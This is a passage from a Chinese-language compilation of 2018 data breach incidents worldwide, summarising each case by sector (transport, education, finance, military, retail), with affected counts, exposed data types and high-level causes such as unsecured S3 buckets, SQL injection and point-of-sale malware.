Svitzer的通信主管Nicole Holyer表示,该公司在今年3月1日收到了警告后阻止了黑客的电子邮件盗窃行为。另根据Holyer的说法,该公司使用由第三方电子邮件服务提供商托管的服务,目前该公司已经向提供商送达了法院命令,以向调查人员提供访问权限。

(二十八) 美国邮政局修复API漏洞,6000万用户个人信息或受影响

2018年11月,据报道,美国邮政局(USPS)周三发布补丁修补了一个API漏洞。攻击者可在该API的“帮助”下,利用任何数量的“通配符”搜索参数获取其他用户的大量数据:从用户名、账号到实际地址和联系方式等等。该漏洞可允许任何拥有USPS.com账户的人查看其他用户账户,大约有6000万美国邮政用户受该安全漏洞影响。

根据Kerbs on Security的报道,这个漏洞在一年前由一名独立的安全研究员首次发现,该研究员随后告知了美国邮政局,然而从未获得任何回复,直到上周Krebs以该研究员名义联系了美国邮政局。

(二十九) 南非再次遭遇数据泄露:近100万公民个人信息网上曝光

继2017 年南非遭遇一起大规模的数据泄露事故,2018年5月,这个国家又发生了一起数据泄露,导致 93.4 万人的个人记录在网络上被曝光。本次曝出的数据,涵盖了国民身份证号码、电子邮件地址、全名、以及明文密码。

南非 eNATIS 驾照人数统计(2017 年 3 月)

在专家帮助下,外媒厘清了数据泄露与南非一家负责在线支付罚款的公司有关。被泄露的数据库,是在一个公共网络服务商上被发现的,系统属于一家处理南非电子交通罚款的公司。

(三十) 尼日利亚最大航空公司Arik Air云泄露大量乘客数据

2018年11月初,据尼日利亚当地媒体《优质时报(Premium Times)》报道,尼日利亚国内最大的航空公司Arik Ai公布的数据显示,该航空公司的大量乘客数据因为一个没有得到保护的亚马逊S3存储桶暴露在了网上。

根据Cloudflare的安全主管Justin Paine的说法,日前他在日常扫描活动中发现了一个包含大量CSV文件的亚马逊S3存储桶,而这些敏感文件很可能归Arik Air航空公司所有。

Justin Paine的分析显示,遭泄露的数据包含了乘客的姓名、电子邮箱地址、订购时的IP地址以及使用的信用卡哈希值。此外,还包括信用卡的信息、订购的日期、支付的金额、使用的货币类型、设备指纹以及出入境机场。

(三十一) 欧洲铁路系统遭遇黑客攻击,大量旅客数据泄露

2018年5月,旅行网站欧洲铁路(Rail Europe)公司向客户发布通告表示,有黑客入侵了该公司的机票预定网站,或已窃取了大量敏感数据。欧洲铁路北美有限公司(RENA)表示,因此次黑客事件可能泄露客户的个人信息包括:

姓名;
性别;
收件地址;
发票地址;
电话号码;
电子邮件地址;
信用卡/借记卡号码;
支付卡到期日期与验证值。
除此之外,某些注册用户的用户名与密码也可能遭遇外泄。更令人担忧的是,黑客已经在 RENA 系统当中驻留近三个月之久。RENA在2018年2月16日与银行联系时,开始意识到其欧洲铁路网站可能存在问题,直到5月才确认该泄露事件。

(三十二) 英国航空承认最近发生的网络攻击比想象中还要糟糕

2018年10月,据外媒报道,英国航空公司(British Airways)证实,发生于9月6日的网络攻击可能已经导致8月21日-9月5日之间的乘客的数据被盗。

在与网络法医专家和英国国家犯罪署合作之后,这家公司还发现,此次攻击之前,受影响的数据包含了7.7万张带有CVV银行卡和10.8万张没有CVV银行卡的姓名、账单地址、电子邮箱地址、卡号、卡有效期。

虽然现在还没有证据表明黑客将银行卡信息用于不法活动,但这起事件还是突显出了即便像英国航空这样的大公司其网络安全状况同样也令人担忧。

(三十三) 中东打车巨头Careem被黑,1400万乘客信息失窃

2018年4月,一家位于迪拜的叫车公司Careem向媒体透露称该公司遭遇了网络攻击并造成了数据泄露。黑客盗取的数据包括用户的姓名、电子邮箱地址、手机号、和行程数据,所有在今年1月14之前注册过Careem的用户都受到了影响。据Careem称,目前无迹象表明黑客有获取到用户的密码和信用卡号。

该数据泄露事件涉及到的用户包括55.8万名司机和1400万乘客。Careem目前在全球13个国家运营,覆盖90个城市。Careem曾宣布其在土耳其和巴基斯坦等国处于市场领先地位。

六、 教育
(三十四) 加拿大亚岗昆学院服务器感染恶意软件,超过11万条记录泄露

2018年7月,位于加拿大安大略省的亚岗昆学院发布了一份声明,通报了一起影响到人数众多的大规模数据泄露事件。此次黑客入侵事件最初发生在2018年5月16日,亚岗昆学院的服务器被发现感染了恶意软件。

该学院已经确认了4568名个人,包括学生和校友,可能遭泄露的数据包括出生日期和家庭住址。另有106931名个人,包括学生、校友以及现任和前任员工,可能遭泄露的信息是一些公开的非敏感信息。学院已经就此事通知了安大略省信息和隐私专员以及渥太华警察局。

(三十五) 教育网站存漏洞,俄罗斯1400万大学毕业生个人信息泄漏

俄罗斯技术社区网站Habrahabr上,一名昵称为NoraQ的用户(黑客)2018年1月29日发文称,1400万名俄罗斯大学毕业生信息泄露。俄罗斯总人口数量约为1.46亿,即十分之一俄罗斯人的信息泄露。泄漏信息包括姓名、出生日期、个人账户的保险号码、纳税人识别号码、电子邮件地址等,文件大小约为5GB。

NoraQ在俄罗斯联邦教育科学联督局服务网站上发现了一个SQL注入漏洞,通过这个漏洞他下载了上述1400万名毕业生信息。

(三十六) 全美最大公立网校FLVS遭遇数据泄露,近37万师生受影响

2018年3月14日,佛罗里达虚拟学校(Florida Virtual School,简称FLVS),在一份声明中表示,近37万名师生的个人敏感信息可能已经遭到了外泄,以及2000多名教师可能会因此受到影响。可能泄漏数据包括学生的姓名、出生日期、学校帐户用户名和密码,以及其父母的姓名和电子邮件地址。

FLVS成立于1997年,是全美第一所也是最大的一所公立虚拟学校。FLVS表示,他们的IT人员在2月曾发现一台服务器存在严重的配置错误问题,这导致该服务器对于黑客来说是“完全开放”的。

目前,FLVS已经将此事通报给了政府执法部门。除此之外,FLVS还将会为受影响的师生提供为期一年的年度免费信用监控服务。

(三十七) 数据泄露影响超过1000万公民,马来西亚教育部SAPS系统紧急下线

2018年6月,据马来西亚媒体Malay Mail报道,在发现存在一个可能暴露超过1000万公民个人信息的安全漏洞之后,由马来西亚教育部推出的学校考试分析系统(SitemAnalisis Peperiksaan Sekolah,SAPS)被迫紧急下线。

报道指出,一位要求匿名的读者在上周五晚向Malay Mail爆料称,教育部此前无视他的警告,迫使他不得不向媒体寻求帮助。之后,他向马来西亚计算机紧急响应小组(MyCERT)进行了通报。MyCERT 在周六中午对Malay Mail出了回应,该系统之后也在同一天被下线。

“这是一个很好的系统,但是它的后端完全失败,他们存储了数以百万计学生的细节记录,但是他们从不隐藏这些信息。一些非常个人的细节可以未经允许被访问,他们只是忽略了它。”这位匿名读者报料说,“这个系统从上线第一天起就存在漏洞。”他还抱怨登录机制是“一个彻头彻尾的笑话”,因为密码存储在一个纯文本文档中,没有进行任何加密处理。

(三十八) 因员工发错邮件,普渡大学2.6万名学生详细信息暴露

2018年5月,美国印第安纳州西拉法叶市的普渡大学(PurdueUniversity)发生了一起数据泄露事件,恰恰就只是因为一名工作人员一不小心犯下的一个低级错误导致的。据报道,在这起数据泄露事件中,所涉及的数据超过2.6万条。

在解释这一事件时,普渡大学助理法律顾问Trent Klingerman表示,该校的一名工作人员原本计划是要发送一份与财政援助计划有关的宣传手册,但无意中将包含学生个人信息的表格发送给了学生的家长。邮件附件是一个Excel文件,包含了超过2.6万名学生的数据。

七、 金融
(三十九) AWS存储桶泄露50.4GB数据,美国消费金融巨头受影响

2018年3月,云安全厂商 UpGuard 公司网络风险小组发现一批由于 Amazon Web Services(简称AWS)S3存储桶未受保护而泄露的50.4GB数据。经证实,此AWS存储桶属于云商务智能(简称BI)与分析厂商 Birst 公司。

这50.4 GB数据涉及Birst公司主要客户Capital One(一家位于弗吉尼亚州麦克莱恩市的金融服务巨头,亦为全美第八大商业银行),包含 Capital One 网络基础设施配置信息以及 Birst 公司的设备技术信息。

根据 UpGuard 公司发布的官方博文,这批数据当中包含密码、管理访问凭证以及私钥,且专供Birst公司内部云环境中的Capital One 相关系统使用。攻击者利用这批遭到泄露的数据足以掌握 Capital One对 Birst 设备的使用方式,进而入侵 IT 系统并深入挖掘该公司的内部资讯。

(四十) Delta、Sears供应商遭网络攻击,数十万名客户信用卡信息可能曝光

2018年4月,据外媒报道,Delta和Sears发布声明称,相关曝光的数据泄露事件可能泄露了数十万客户的信用卡资料。上述数据泄露事件最先由路透社曝出,其发生的地点为一家同时为Delta和Sears在线聊天平台提供服务的公司。

目前,联邦执法部门、银行以及IT安全公司正在对这一安全事件进行调查。而Sears和Delta都分别开设了针对此事件的客户通道,前者开通了一个客户咨询热线,后者设立了一个专用解答网页delta.com/response。

(四十一) NAS配置不当,保险公司大量敏感数据泄露

2018年1月19日,UpGuard网络风险研究主任Chris Vickery留意到了美国马里兰联合保险协会(MDJIA),因为他发现了属于该保险协会的一个联网存储(NAS)设备,该设备通过一个开放端口与互联网连接,而它内含与协会IT运营的重要敏感数据。因存储设备的错误配置,将数千客户的信息泄露到网上。

与被泄数据存储一起被曝光的是JIA客户文件和声明的备份,包括客户姓名,地址,电话号码,生日以及社保号,支票扫描件,银行账号和保险单号。除了这些重要的客户信息,这次泄露还曝光了一个内部访问凭证数列,它原本用于管理和控制MDJIA协会的运营,包括远程桌面,邮件,第三方用户名和密码。

(四十二) PayPal旗下移动支付服务Venmo默认公开用户交易信息(已遭滥用)

2018年7月,一名隐私提倡者Hang Do Thi Duc发布最新调查结果表示,多数 Venmo 交易被记录在任何人均可访问的一个公共 API 中,原因是 Venmo app 的默认设置为所有用户设置为“公开”。他通过这一隐私策略查询 Venmo API 并下载了该公司所有2017年的公开交易记录,总计 207,984,218 条。

除非用户特别更改了这个值,否则他们通过 Venmo 转账 app 做出的所有交易都被记录且任何人均可通过 Venmo 公共 API 遭访问。通过这个 API 暴露的数据包括发送人和收款方的姓和名、Venmo 头像、交易日期、交易留言、交易类型等。据悉,Venmo 是一款仅在美国使用的移动支付应用,于2009年推出。2013年,Venmo 成为 PayPal 子公司。

(四十三) 澳大利亚联邦银行遗失了1200万条用户银行数据

2018年5年,外媒BuzzFeed报道,澳大利亚第一大商业银行澳大利亚联邦银行(CBA)证实,包含客户姓名、地址、账号和2000年至2016年的交易详情记录的两个存储磁带,在一次数据中心转运任务中被其分包商Fuji-Xerox丢失。其中至少包含1200万名用户的银行交易数据。

当银行意识到这起事件时,其委托三方统计公司毕马威(KPMG)进行过一次独立的剖析调查,以了解具体情况,并通知了澳大利亚信息专员办公室(OAIC)。毕马威(KPMG)在调查后发现存储带很有可能已被处置,很难寻回。

(四十四) 超2万张银行卡数据在暗网兜售,几乎涵盖巴基斯坦国内所有银行

2018年11月,据巴基斯坦GEO电视台报道,几乎所有巴基斯坦银行在最近都受到了黑客入侵的影响,而这一令人震惊的消息已经在上周得到了巴基斯坦联邦调查局(FIA)网络犯罪部门负责人的证实。

根据俄罗斯网络安全公司Group-IB最近发布的一份报告,其在暗网上发现一批数据,包含了超过2万张巴基斯坦银行卡的详细信息,而这些数据归属于在该国运营的“大多数银行”的客户。巴基斯坦PakCERT的专家认为,这些数据是通过银行客户的刷卡行为获得的。这些支付卡数据正在暗网出售,售价从100美元至160美元不等。

(四十五) 黑进上百家美国企业窃取1500万张信用卡记录,三名乌克兰黑客被捕

2018年8月,据外媒报道,三名乌克兰公民近日因参与一项针对100多家美国企业的长期网络攻击行动而被捕。根据起诉书了解到,该团伙在过去总共从6500多个销售点终端盗取了超1500万张信用卡记录。据安全研究人员介绍,这个叫做Carbanak的团伙利用社交工程和网络钓鱼攻击渗入到企业并从中盗取金融数据。

最初的感染主要通过恶意软件诸如电子邮件附件或有时候假装丢失酒店预订信息或SEC(美证券交易委员会)投诉文件展开。

现在,Dmytro Fedorov、Fedir Hladyr、Andrii Kolpakov被控犯有阴谋罪、电信欺诈罪、计算机黑客罪、访问设备欺诈罪、严重身份盗窃罪等26项罪名。

(四十六) 汇丰银行美国分部发生非授权访问和数据泄露

2018年11月,汇丰银行(美国)通知客户10月4日至10月14日期间发生了数据泄露,攻击者访问了访问该金融机构的在线账户。

泄露的信息包括:客户全名,邮寄地址,电话号码,电子邮件地址,出生日期,帐号,帐户类型,帐户余额,交易历史记录,收款人帐户信息以及可用的帐单历史记录。

为应对安全漏洞,汇丰银行的美国子公司暂停了在线账户访问以防止滥用。数据泄露后,汇丰银行加强了个人网上银行的认证流程,增加了额外的安全保障。

(四十七) 加拿大两家银行遭黑客勒索,9万名客户信息被盗

2018年5月,据加拿大《环球邮报》报道,两家加拿大银行——蒙特利尔银行(Bank ofMontreal)和网上银行SimpliiFinancial——都对外表示遭到黑客袭击,并且发出警告称,袭击两家银行的黑客声称已经访问了客户的账户以及相关个人信息,并威胁将公开这些数据。约9万名客户信息被盗,这可能是加拿大金融机构遭受的首次重大攻击。

蒙特利尔银行的发言人表示,事件之后收到了攻击者的威胁,称若不支付100万赎金就将公开被盗客户数据。此次两家银行遭受的袭击事件似乎是相关联的。该行表示,目前正在进行彻底调查并且已经告知所有相关联的机构来评估潜在的损失。

(四十八) 离职员工窃取客户联系人名单,SunTrust银行150万客户信息泄露

2018年4月,美国SunTrust银行证实,在一名离职员工偷窃了该公司的客户联系人名单之后,超过150万名客户的个人信息可能已经因此遭到泄露。

SunTrust银行的首席执行官William Rogers称,这属于团伙作案,这名离职的前员工通过与第三方合作成功对公司的客户联系人名单进行了盗窃。名单包含的客户个人信息包括客户的姓名、地址、电话号码以及某些账户余额。

Rogers表示,SunTrust银行正在积极配合第三方安全专家和执法部门进行事件调查。尽管调查工作仍在在进行中,但出于对客户负责,SunTrust银行正在主动通知约150万名客户。

(四十九) 美国征信公司信息泄露事件升级,新增240万受害者

2018年3,据报道,美国征信公司伊奎法克斯(Equifax)表示,关于2017年9月曝出的1.4亿用户个人信息泄露事件,近日又发现另外240万名受害者。

伊奎法克斯称,之前未发现新的受害客户,是因为他们的社会安全号码并未与部分驾照资讯一同被窃取。而社会安全号码似乎是被黑客攻击的重点。该公司还表示,将会通知这些用户,并为他们提供防盗保护和信用报告监控服务。

(五十) 新蛋网用户信用卡数据泄漏:恶意代码已侵入约1个月

2018年9月下旬,据报道,在过去约1个月的时间,购物网站新蛋(Newegg)的用户数据发生泄露事故,目前新蛋正在对网站进行整理改进。

有安全研究人员发现,黑客将15行恶意盗刷代码植入新蛋网支付页面,从8月14月-9月18日,代码一直存在。这种恶意代码从用户手中窃取信用卡数据,传输到由黑客控制的服务器。黑客的代码同时影响桌面端和移动端用户,只是目前还不清楚移动端用户是否已经受到影响。安全研究人员指出,攻击新蛋网的方式十分巧妙,伪装极好,与英国航空公司(British Airways)信用卡泄露事件、以及之前发生的Ticketmaster泄露事件有些类似。

(五十一) 智利1.4万信用卡资料被黑客组织盗取

2018年7月,根据智利政府公布的消息,黑客盗取了智利约1.4万张信用卡的资料,并将这些资料公布在社交媒体上。

据报道,在这起案件中,黑客公布了信用卡卡号、有效期限及安全码,受攻击影响的银行包括桑坦德银行(Santander)、伊塔乌银行(Itau)、丰业银行(Scotiabank)和智利银行(Banco de Chile),这些银行已通知客户遭入侵一事。

智利政府的银行监管机构表示,这起袭击行动是黑客组织“影子经纪人”(Shadow Brokers)展开的,该组织因入侵美国国家安全局(NSA)而闻名。

(五十二) Dark Overlord黑客发布了第一批“秘密”911文件

据雷锋网报道,2018年12月31日,黑客组织DarkOverlord在一篇发表于源代码分享网站Pastebin上的帖子中威胁称:

他们已经从一家为保险公司Hiscox Syndicares Ltd.提供咨询服务的律师事务所窃取到文件。事后,律师事务所与黑客组织达成了赎回协议,并确定对方按协议缴纳赎金即可拿回全部数据。但是,该律师事务所并未履行诺言,向执法部门进行了报告。

2019年1月初,Dark Overlord竟然真的公布了大约70M的911恐怖袭击相关资料,同时第一批解密密钥被公之于众。

八、 军事

(五十三) 超过两万名美国海军陆战队队员个人资料遭意外泄露

2018年3月,根据美国海军陆战队机关报《海军陆战队时报(Marine CorpsTimes)》的报道,约21, 426名海军陆战队士兵、水手和其他相关工作人员的个人敏感信息被意外暴露给了外界。泄露信息包含大量高度敏感的信息,例如社会安全号码、银行电子资金转账记录和银行转账号码、信用卡信息、家庭住址以及紧急联系信息等。

报道称,事件原因已查明,在2月26日早上,美国国防部的自动监护旅游系统(Defense Travel System,DTS)将一封未加密的电子邮件发送给了一份错误的电子邮箱地址列表。未加密的电子邮件不仅被无意中发送给了民用帐户,而且还被发送给了在未分类的海军官方域名“usmc.mil”上托管的帐户。目前,还不清楚有多少人收到这封电子邮件。

(五十四) 美空军“死神”无人机文件泄露

2018年7,威胁情报公司 Recorded Future 发布报告指出,其2018年6月发现有黑客在暗网出售美国空军MQ-9 Reaper(“死神”) 无人机的相关文件,这份文件包含与MQ-9 Reaper 相关空军人员名单、无人机维护和培训资料。经研究人员调查确认,这些文件是真实的。

研究人员调查发现,这名黑客通过先前披露的 FTP 漏洞访问了美国 Creech 空军基地一台 Netgear路由器,从而获取了这些文件。而事件中,同样遭遇入侵的一名上尉,2018年2月刚完成了网络安全培训,理应了解防止非授权访问的必要操作。

(五十五) 女童子军信息泄露事件中2800名成员个人信息外泄

2018年11月,黑客入侵美国加利福尼亚州橙县女童子军分部,2800名女童子军及其家庭成员个人信息可能遭泄露。据橙县女童子军称,某未知威胁者于9月30日至10月1日实施入侵,获取了该童子军分部运营的电子邮箱账户的访问权限,并用其发送邮件。

据女童子军分部(GSOC)称,该账户之前用于为女童子军成员安排出行,因此,黑客可通过访问该账户获取个人数据。经确认,黑客或已窃取部分成员姓名、出生日期、家庭住址、保险单号及健康病历。专家警告,外泄信息可能被用来进行基于社会工程学的网络攻击。

(五十六) 热门无人机交易网站数据库泄露,致使英国军方警方政府单位的购买记录曝光

2018年4月,热门无人机交易网站 DronesForLess.co.uk 将未加密的整个交易数据库暴露在网上,导致数千名警方、军方、政府和私人客户的购买记录遭曝光。Secret-bases.co.uk 公司的 Alan 发现了这起事件,他指出,DronesForLess.co.uk 的运营人员未能保护 web 基础设施的关键部门免遭好奇之人的窥探。

约1万多份购买收据存储在该网站的 web 服务器中。收据详情包括购买人姓名、地址、电话号码、邮件地址、IP 地址、用于连接到该网站的设备、下单商品详情、发卡行以及付款用的信用卡的后四位数字。涉及的客户名称包括伦敦警察厅、英国陆军预备役少校、英国国防部采购部门某员工、英国国家犯罪局某员工、英国国防科技实验室、英国陆军步兵试验和开发部队 (Infantry Trials and Development Unit)。

(五十七) 英国空军遭遇黑客攻击,F-35隐形战机数据疑泄露

英国《每日邮报》2018年8月6日报道,英国皇家空军F-35B 战机的部分信息已经泄露!英国计划从美国购买138架该型战机,皇家空军和海军航空兵都将装备。

然而,英国皇家空军一名女军人的手机约会应用软件 Tinder 账户被黑客入侵,黑客在获取她的信息后,开始以她的身份与一名男同事(空军)联系,聊起了两个月前刚抵达英国的 F-35A 隐身战机。

尽管这名女军人很快就发现自己的账号被盗用了,但还是晚了。从黑客与那名男同事的聊天记录来看,黑客非常得心应手用各种语言陷阱,从那名男同事那里套取了 F-35B 战机的部分信息,其中不乏机密信息。

(五十八) 中东地区政军企高层遭钓鱼间谍攻击,攻击者已收集逾30GB数据

2018年5月,根据Lookout 安全公司发布的报告,攻击者使用“Steal Mango”等监控软件工具成功地攻陷政府、军方、医疗等人员的移动设备,已经收集了超过30G的受攻陷数据,包括通话记录、音频记录、设备位置信息以及文本信息。某钓鱼攻击活动通过自定义监控软件感染安卓设备,从多个国家尤其是中东地区的高层提取数据。

Lookout 公司表示,约100台独立设备遭针对性监控活动的影响,包括政府官员、军方人员的设备,以及位于巴基斯坦、阿富汗、印度、伊拉克和阿联酋等地的活动家。其它国家如美国和德国的官员数据也遭收集。

九、 生活服务
(五十九) GDPR施行后,英国电子零售商DixonsCarphone公布严重数据泄露事件

2018年6月,英国家喻户晓的手机零售商 DixonsCarphone 宣布,正在调查“对公司所持有的某些数据的越权访问”。该公司指出该越权访问“试图攻陷Currys PC World 和 Dixons Travel 商店中其中一个处理系统中的590万张卡”,“以及包含非金融个人数据的120万个记录,如姓名、地址或邮件地址”。

这可能是英国历史上发生的规模最大的数据泄露事件。

如果整个事件被按 GDPR 规定处理,那么 ICO 可能会对 Dixons Carphone 开出全球年收入总额的4%的罚单。去年,该公司的年销售总额为105亿英镑(折合140亿美元)。根据 GDPR 开出的罚单可能达到数亿英镑。

(六十) 阿迪达斯可能泄漏了数百万美国消费者信息,官方称正在调查

2018年6月,德国运动品牌阿迪达斯在网站上发布通知称,未授权人员声称获得对消费者数据的访问权限,数百万名美国消费者或受影响。

未经授权人员可能已获得访问在阿迪达斯美国网站上购物的消费者用户名、密码哈希和通讯信息的权限,该公司将它们称之为“有限信息”。阿迪达斯向某些媒体机构表示事件可能影响“数百万”消费者,但它发布声明称并非所有位于美国的消费者均受影响。

(六十一) 法国眼镜连锁店Optical center因泄露用户数据被罚25万欧元

2018年6月,据《费加罗报》报道,法国眼镜连锁店 Optical center 因泄露用户数据,被法国独立机构信息与自由委员会( Cnil )罚款25万欧元(约合人民币188.66万元),该金额创造了Cnil 最高罚款记录。

法国当局表示,这是 Cnil 首次开出如此高金额的罚单。2017年7月,Cnil 接到相关举报后查证,Opticalcenter 的用户可以通过其网站主页看到其他客户的购物发票。这些发票包含姓名、邮箱地址和视力矫正度数等一些私人信息,部分发票上还有用户的社保帐号。

据悉,法国2016年颁布的个人信息数据保护法使得Cnil 的惩罚权限,由15万欧元上调至300万欧元;而GDPR,让这一数字上调至2000万欧元和营业额的4%。

(六十二) 健康应用PumpUp服务器未设密码,超过600万用户个人信息暴露

2018年6月,据外媒ZDnet报道,位于加拿大安大略省的PumpUp公司发布声明称,旗下同名社交健康追踪应用无意中暴露了用户的隐私和敏感数据,包括用户之间发送的健康信息和私人消息。

PumpUp公司在全球拥有超过600万用户。其数据都被存储在一个核心的后端服务器,并托管在亚马逊的云端。然而,安全研究员Oliver Hough发现,该服务器并没有设置密码,这使得任何人都能够查看都有谁在进行登录、谁在实时发送消息以及消息的内容。

ZDnet指出,暴露的数据主要包括用户的电子邮箱地址、出生日期、性别和用户所在位置的地理信息,以及用户的生物特征、锻炼和活动目标、用户头像,还有用户是否已经被屏蔽、是否对应用进行了评分。此外,该应用还暴露了用户提交的健康信息,如身高、体重、咖啡因和酒精摄入量、吸烟频率、健康问题、药物和受伤处等。

(六十三) 酒店预订软件FastBooking被黑,数百家酒店旅客入住和支付信息泄露

2018年6月,数百家酒店的旅客个人详情和支付卡数据被盗,而数据是从巴黎公司FastBooking 被盗的。该公司向全球100个国家的4000多家酒店出售酒店预订软件。

FastBooking 公司称,事件发生在6月 14日,当时攻击者利用托管在服务器上某个应用中的漏洞安装恶意工具(恶意软件)。该工具可导致黑客远程访问服务器以提取数据。6月19日FastBooking 员工发现数据遭泄露,并在不到6小时的时间里解决了该问题。

FastBooking 公司指出,黑客窃取的信息包括旅客的姓氏和名字、国籍、邮政地址、邮件地址以及和酒店预订相关的信息(酒店名称、入住和离店详情)。在某些情况下,某些支付卡详情也被盗,如打印在支付卡上的姓名、卡号及其有效期。

(六十四) 美国Chili’s连锁餐厅支付系统被黑,用户支付卡信息遭破坏

2018年5月布林克国际公司发现其旗下Chili’s连锁餐厅1600家门店的顾客支付卡信息受到破坏,这可能导致部分餐厅顾客的支付卡相关信息被非法访问或盗窃。经初步调查,这一恶性事件发生的时间范围为2018年3月——4月。

Chili’s考察后确定这是由于有人将恶意软件放置在餐厅销售点的机器内,使得同伙可以从他们的相关支付系统中删除在餐厅消费顾客的支付卡信息(包括信用卡、借记卡、卡号及持卡人姓名)。

Chili’s当前正与一个外部取证技术团队合作,以尽快确定信息缺口的性质及全部范围。与此同时,以最快速度向顾客发布了通知,承诺尽可能提供欺诈解决和信用监控服务,还给出了详细具体的参考安全建议。

(六十五) 美国连锁餐厅Applebee被黑,160多家门店POS系统支付信息泄漏

2018年3月,根据RMH特许经营控股(RMH Franchise Holdings)在其网站上发布的公告来看,部分由RMH拥有和经营的Applebee餐厅的销售点(POS)系统被匿名黑客安装了恶意软件,旨在窃取消费者的支付卡信息。这意味着消费者的姓名、支付卡号码、以及在限定时间内处理的卡片验证码可能因此遭到了泄露。

RMH透露,这起事件是在2月13日被发现的。在得知潜在事件后,RMH立即展开了调查并获得了网络安全取证公司的帮助。根据公告显示,事件影响了位于阿拉巴马州、亚利桑那州、佛罗里达州等14州的160多家Applebee餐厅,这几乎代表了RMH拥有和经营的所有餐馆。

(六十六) 美国奢侈品巨头Saks Fifth Avenue遭黑客攻击,500万张银行卡信息被盗

2018年4月,根据安全公司Gemini Advisory披露,奢侈品百货连锁Saks Fifth Avenue (萨克斯第五大道精品百货店)已证实遭受攻陷,500万购物者的银行卡信息遭泄露。初步分析表明犯罪分子窃取数据的时间实在2017年5月至今。从目前对可用数据的分析来看,除了Saks FifthAvenue,Lord &Taylor的实体店整个网络同样遭攻陷。而黑客组织 Fin7 炫耀称其攻陷了 Saks 的计算机系统。

Gemini Advisory 指出,由于 Saks 的客户是高收入群体,因此被盗的银行卡对于欺诈者而言价值尤高,因为高收入群体的支付卡盗用情况难以检测。

(六十七) 美国线上旅行社Orbitz遭遇黑客攻击,88万客户个人资料或已泄露

2018年3月22日,据国外综合新闻平台PhocusWire的报道,美国在线旅游巨头Expedia旗下的在线旅行社Orbitz公司在本周二公开宣布称,其在线旅游预定平台存在一个严重的安全漏洞,而这个漏洞可能会使得大约88万名Orbitz客户面临数据泄露风险。

信息泄露所涉及到的客户是那些于2016年上半年在Orbitz预定平台以及于2016年至2017年在Orbitz商业合作伙伴平台进行订单交易的客户,存在泄露风险的信息可能包括姓名、支付卡信息、出生日期、电话号码、电子邮件地址、帐单地址和性别等。

根据Expedia的说法,这个漏洞是该公在司对Orbitz的商业合作伙伴Travelocity运行的平台进行调查时发现的,而Orbitz平台和该平台处于相同的环境中。

(六十八) 美国最大面包连锁店Panerabread泄露数百万顾客隐私长达八个月

2018年4月4日,网络安全公司KrebsOnSecurity在本周一发表的文章中指出,美国最大面包连锁店Panerabread旗下网站panerabread.com泄露了数百万顾客记录,包括姓名、生日、电子邮箱地址、家庭住址以及信用卡号码的最后四位数字。

KrebsOnSecurity还表示,在他们与该公司取得联系后,该网站已在周一早些时候离线。而截止到这个时间,这起数据泄露事件至少已经持续了长达八个月的时间。

安全研究人员已在去年8月通知了该公司。当被问及到在2017年8月进行通报后直到现在以来,是否看到有任何迹象表明Panerabread曾试图解决这个问题时,Houlihan表示“从来没有”。目前尚不清楚该公司的网站到底暴露了多少顾客记录,但该网站索引的增量客户数据表明,这个数字可能高于700万。

(六十九) 内鬼作祟!可口可乐承认8000名员工的个人信息被泄漏

2018年5月25日,据外媒 Bleeping Computer报道,可口可乐公司本周对外宣布了一起数据泄露事件,他们在前员工的个人硬盘中,发现了大量现有员工的个人数据,而这些数据,是该前员工从可口可乐违规挪用的。

这起泄漏时间从去年9月被发现,直到本周才对外宣布。事件影响8000可口可乐员工。目前,可口可乐正通过第三方供应商向受影响的员工提供一年的免费身份监测。

(七十) 纽约9家B&BHG餐厅遭恶意软件感染,顾客支付卡数据泄漏

2018年7月,据多家国外媒体报道,B&BHG酒店集团(B&B Hospitality Group)证实该集团在纽约市运营的9家餐厅所配备的销售终端(POS)被发现感染了恶意软件。初步调查结果显示,此次黑客入侵发生在2017年3月1日至2018年5月8日之间,黑客可能已经偷走了支付卡号码、持卡人姓名、支付卡有效日期、内部验证码以及其他一些付款信息。

第三方网络风险管理平台公司CyberGRX的首席执行官Fred Kneip表示:“一个企业数字生态系统中的所有第三方都需要不断评估他们引入的风险水平,这一点对于销售终端解决方案提供商来说尤其重要,因为他们能够访问所有的支付数据。”

(七十一) 新西兰网盘Mega上万帐号密码遭泄露,被公开在VirusTotal上

2018年7月17日,据外媒 ZDNet 报道,Mega —— 这家于新西兰成立并提供在线云存储和文件托管服务的公司,目前被发现其平台中有成千上万的帐号凭证信息已在网上被公开发布。被泄露的信息以文本文件形式提供,涉及超过 15,500 条用户名、密码和文件名的数据。

这份文本文件最早由Digita Security公司的首席研究官和联合创始人 Patrick Wardle 于6月份在恶意软件分析 VirusTotal 上发现,而这份文件是在几个月前由一名据称在越南的用户上传的。

(七十二) 云泄露最前线:巴西订阅视频服务Sky Brasil暴露32.7万用户信息

2018年12月4日,独立研究员Fabio Castro发现,巴西最大的订阅电视服务公司Sky Brasil泄露了32.7万用户的信息,包括28.7GB的日志文件和429.1GB的API数据,这些数据涉及姓名,家庭住址,电话号码,出生日期,客户端IP地址,付款方式和加密密码。

虽然Castro发现了这一事件后通知了Sky Brasil,公司随后也对数据库进行了密码保护;但其服务器至少从10月中旬就开始在Shodan上被编入索引,目前还不清楚数据库的访问者数量。

(七十三) 知名运动品牌Under Armour 1.5亿用户数据被泄露,称不涉及敏感信息

2018年3月30日,据报道,本周四,美国著名运动装备品牌Under Armour称有1.5亿 MyFitnessPal用户数据在上个月被泄露了,MyFitnessPal是一款Under Armour旗下的食物和营养主题应用。

此次关于用户数据泄露的声明使得该公司的股票价格下跌了2.4%。据该公司称,此次数据泄露事件影响到的用户数据包括用户名、邮箱地址、和加密的密码。该运动装备制造商称,是在3月25日才发现的此次数据泄露事件,并从那时就开始通知受影响用户。

(七十四) 珠宝电商MBM公司130万客户信息泄漏,内含明文密码

2018年3月18日,据雷锋网报道,MBM 公司被德国安全公司Kromtech Security 的研究人员抓住了小辫子。研究人员在不安全的亚马逊 S3 存储桶中发现了该公司的MSSQL 数据库备份文件。

最初,研究者怀疑这些数据归沃尔玛所有,因为这个存储桶被命名为“walmartsql”,不过后来他们通过分析后发现,这些数据的主人其实是 MBM 公司。在对泄露文档作了进一步评估后他们发现,这里容纳了超过 130 万人(准确来说是 1314193 人)的私人敏感数据。这些数据包含个人住址、email 地址、IP 地址和邮政编码,许多客户的密码甚至直接用明文显示,毫无安全性可言。

安全专家支招称,直接把敏感信息存入一个向公众开放的存储桶可不是什么高明的决定,没有对密码进行加密更是不可饶恕。

十、 物联网
(七十五) 俄罗斯视频监控公司iVideon数据泄露,涉及超过82万名用户个人信息

